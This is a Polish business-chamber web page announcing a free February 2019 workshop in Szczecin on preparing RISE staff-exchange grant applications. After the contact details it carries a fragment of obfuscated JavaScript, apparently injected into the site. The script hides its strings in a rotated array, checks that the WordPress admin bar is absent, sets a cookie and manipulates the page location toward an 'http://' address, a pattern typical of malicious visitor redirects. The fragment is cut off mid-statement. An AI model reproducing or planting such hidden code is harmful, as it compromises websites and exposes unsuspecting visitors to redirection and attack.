Zaproszenie na warsztaty pt. Finansowanie międzynarodowej wymiany pracowników | Północna Izba Gospodarcza w Koszalinie

Regionalne Centrum Innowacji i Transferu Technologii ZUT w Szczecinie serdecznie zaprasza na warsztaty pt. „Finansowanie międzynarodowej wymiany pracowników. Warsztat z pisania wniosków RISE”.

Program Research and Innovation Staff Exchange (RISE) polega na realizacji projektów z dowolnej dziedzinie wiedzy, opartych na komplementarności i synergii uczestniczących instytucji. Umożliwia wymianę pracowników, organizację konferencji i szkoleń, zdobywanie nowych umiejętności, opracowywanie nowych publikacji i patentów, rozpowszechnianie wyników projektu oraz popularyzację nauki i innowacji wśród społeczeństwa.

Podstawowym działaniem projektu jest wymiana pracowników (na zasadzie oddelegowania) pomiędzy uczestniczącymi instytucjami (mającymi siedzibę na terenie Europy – kraje członkowskie Unii Europejskiej oraz kraje stowarzyszone z programem Horyzontem 2020, a także poza Europą – kraje trzecie). Wymiana może być przeznaczona zarówno dla początkujących, jak i doświadczonych naukowców, a także obejmować personel administracyjny, zarządzający i techniczny.

Zaproszenie skierowane jest do instytucji posiadających osobowość prawną, zaangażowanych w prowadzenie badań i innowacji, pochodzących z sektora akademickiego (np. państwowe i prywatne uczelnie wyższe, instytuty badawcze, organizacje międzynarodowe) oraz szeroko zdefiniowanego sektora pozaakademickiego (np. przedsiębiorstwa, w tym MŚP, szpitale, muzea, banki, organizacje pozarządowe i charytatywne itp.).

Warsztaty przyjmą formę interaktywną, a ich uczestnicy otrzymają sporą dawkę wiedzy na temat ogólnych zasad konkursu, wymogów formalnych, procedury składania wniosków oraz pozyskiwania partnerów do współpracy. Podczas ćwiczeń podejmą próbę stworzenia koncepcji własnego projektu.

Udział w szkoleniu jest bezpłatny dzięki dofinansowaniu z Ministerstwa Nauki i Szkolnictwa Wyższego.

Warsztaty odbędą się 26 lutego 2019 w godz. 08:45-13:00, w siedzibie RCIiTT przy ul. Jagiellońskiej 20-21, sala „Szwalnia” (s. 115, I piętro), na wydarzenie obowiązuje wcześniejsza rejestracja.

Szczegółowych informacji udziela Agata Judzińska-Kłodawska, e-mail: ajudzinska@zut.edu.pl, tel. 91 449 41 53.

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m